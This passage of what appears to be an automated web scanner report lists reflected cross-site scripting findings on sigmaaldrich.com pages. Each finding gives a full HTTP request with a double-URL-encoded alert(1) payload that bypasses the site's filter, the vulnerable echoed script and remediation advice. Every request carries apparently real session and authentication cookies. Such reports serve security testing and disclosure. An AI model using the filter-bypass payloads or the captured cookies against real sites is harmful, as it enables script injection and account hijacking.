Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 28968
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichfc060";alert(1)//7e103f95f12/customer-support/customer-service/about-us","E404") ;
   </script>
...[SNIP]...

1.143. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edecd%2522%253balert%25281%2529%252f%252f41673377967 was submitted in the REST URL parameter 3. This input was echoed as edecd";alert(1)//41673377967 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-supportedecd%2522%253balert%25281%2529%252f%252f41673377967/customer-service/about-us HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:36 GMT
Content-Length: 28968
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-supportedecd";alert(1)//41673377967/customer-service/about-us","E404") ;
   </script>
...[SNIP]...

1.144. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10095%2522%253balert%25281%2529%252f%252f531c73a07c2 was submitted in the REST URL parameter 4. This input was echoed as 10095";alert(1)//531c73a07c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service10095%2522%253balert%25281%2529%252f%252f531c73a07c2/about-us HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 28968
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service10095";alert(1)//531c73a07c2/about-us","E404") ;
   </script>
...[SNIP]...

1.145. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74c96%2522%253balert%25281%2529%252f%252feb0664a475a was submitted in the REST URL parameter 5. This input was echoed as 74c96";alert(1)//eb0664a475a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/about-us74c96%2522%253balert%25281%2529%252f%252feb0664a475a HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:39 GMT
Content-Length: 28968
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/about-us74c96";alert(1)//eb0664a475a","E404") ;
   </script>
...[SNIP]...

1.146. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4379b%2522%253balert%25281%2529%252f%252f6c1d23627a2 was submitted in the REST URL parameter 1. This input was echoed as 4379b";alert(1)//6c1d23627a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content4379b%2522%253balert%25281%2529%252f%252f6c1d23627a2/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:33 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content4379b";alert(1)//6c1d23627a2/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows","E404") ;
   </script>
...[SNIP]...

1.147. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f00c%2522%253balert%25281%2529%252f%252f5533200960d was submitted in the REST URL parameter 2. This input was echoed as 8f00c";alert(1)//5533200960d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich8f00c%2522%253balert%25281%2529%252f%252f5533200960d/customer-support/customer-service/about-us/meetings-and-shows HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
